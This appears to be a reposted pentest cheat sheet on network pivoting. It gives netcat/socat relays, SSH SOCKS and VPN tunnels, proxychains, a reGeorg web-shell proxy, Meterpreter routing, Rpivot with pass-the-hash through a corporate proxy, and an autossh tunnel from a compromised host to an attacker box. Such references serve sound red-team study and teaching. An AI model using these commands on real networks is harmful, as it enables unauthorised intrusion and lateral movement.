Basic Pivoting Types
| Type | Use Case |
|---|---|
| Listen - Listen | Exposed asset, may not want to connect out. |
| Listen - Connect | Normal redirect. |
| Connect - Connect | Can’t bind, so connect to bridge two hosts |
Listen - Listen
Netcat - Pivot Host
ncat -v -l -p 8080 -c "ncat -v -l -p 9090"
Socat - Pivot Host
socat -v tcp-listen:8080 tcp-listen:9090
Remote host 1
We connect to the first side of the listen->listen trigger and send the file as input.
ncat localhost 8080 < file
Remote host 2
We connect to the second side of the listen->listen trigger and write the output to disk.
ncat localhost 9090 > newfile
Listen - Connect
Netcat - Pivot Host
ncat -l -v -p 8080 -c "ncat localhost 9090"
Socat - Pivot Host
socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
Remote host 1
We connect to the listen side of the listen->connect trigger and send file as input.
ncat localhost -p 8080 < file
Remote host 2
We wait and listen for the connect from the listen->connect trigger and write the file to disk.
ncat -l -p 9090 > newfile
Connect - Connect
Netcat - Pivot Host
Remote host listeners must be bound first.
ncat localhost 8080 -c "ncat localhost 9090"
Socat - Pivot Host
Remote host listeners must be bound first.
socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
Remote Host 1
We bind and listen to port 8080 and send the file as input.
ncat -l -p 8080 < file
Remote Host 2
We bind and listen to port 9090 and write the data to disk.
ncat -l -p 9090 > newfile
SSH Tunnels
Dynamic SOCKS Proxy
This can be used with proxychains to forward client traffic through the remote server.
ssh -D8080 [user]@[host]
Local Port Forwarding
This will bind to [bindaddr]:[port] on the client and forward through the SSH server to the [dsthost]:[dstport]
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote Port Forwarding
This will bind to [bindaddr]:[port] on the remote server and tunnel traffic through the ssh client side to [localhost]:[localport]
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
Establish VPN over SSH The following options must be enabled on the server side.
PermitRootLogin yes
PermitTunnel yes
ssh [user]@[host] -w any:any
You can see the established tun interface by typing ifconfig -a
The interfaces and forwarding must still be configured. This assumes that we are going to forward 10.0.0.0/24 through the remote server. We are also assuming that the server’s main connection is through eth0, and both client/server stood up tun0. This may be different if you already have existing VPN connections.
Client
ip addr add 192.168.5.2/32 peer 192.168.5.1 dev tun0
# Once Server is setup, run the following to add routes
route add -net 10.0.0.0/24 gw 192.168.5.1
Server
ip addr add 192.168.5.1/32 peer 192.168.5.2 dev tun0 sysctl -w net.ipv4.ip_forward=1iptables -t nat -A POSTROUTING -s 192.168.5.1 -o eth0 -j MASQUERADEProxychains
The configuration file in /etc/proxychains.conf must be edited to point towards your SOCKS proxy. Typically this is done with an SSH or other type of tunnel. Make sure your ports match.
[ProxyList]
socks4 localhost 8080
Now, in order to run any type of network through the proxy just run it like so. Remember, you can’t run any raw socket scans through a SOCKS4 proxy. You need to setup an SSH VPN tunnel or something similar for that type of functionality.
proxychains nmap 192.168.5.6
Web Shell SOCKSProxy (reGeorg)
reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx,asph,jsp, or php. Simply upload the desired file to the webserver.
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
You are now free to use your regular tools using proxychains.
Meterpreter
Meterpreter allows you to create pivoting routes within the framework for use with any of the builtin modules. To automatically route, just use the following.
run autoroute -s 192.168.5.1/24
To print routes
run autoroute -p
Meterpreter - SOCKS Proxy
Now you can run other tools through Meterpreter using proxychains.
use auxiliary/server/socks4a
set SRVPORT 8080
run
Forward single ports
Below will forward rdesktop sessions from localhost port 3389 to the target 192.168.5.9 through Meterpreter as a tunnel.
portfwd add -L 127.0.0.1 -l 3389 -r 192.168.5.9 -p 3389
Rpivot
Rpivot is a great SOCKS proxy based pivot tool that works like SSH’s dynamic proxy -Doption, but it works in the reverse order.
Server (Attacker box)
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
Client (Compromised box)
python client.py --server-ip <ip> --server-port 9443
The Server will now have a SOCKS proxy on port 1080 that will forward traffic through the [client].
Through corporate proxy
Rpivot also works through corporate proxies.
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3ePassing the hash
If you prefer passing the hash, then you’re also in luck.
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] --ntlm-proxy-port 8080 --domain CORP --username jdoe --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EEAutoSSH
AutoSSH is a tool that allows you to automatically restart SSH sessions and tunnels. The following line will open port 2222 on host attacker and tunnel it to the compromised host on port 22. You would then be able to setup a dynamic SSH SOCKS proxy and connect to localhost:2222 and be able to forward through the compromised host as normal.
autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 2222:localhost:22 [evil]@[attacker]
References
-
https://artkond.com/2017/03/23/pivoting-guide/
-
https://github.com/rofl0r/proxychains-ng
-
https://github.com/artkond/rpivot
-
https://github.com/sensepost/reGeorg
-
https://metasploit.com/
点击左下角“阅读原文”查看原版文章内容。
本文始发于微信公众号(DMZLab):【转推】Network Pivoting Techniques
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论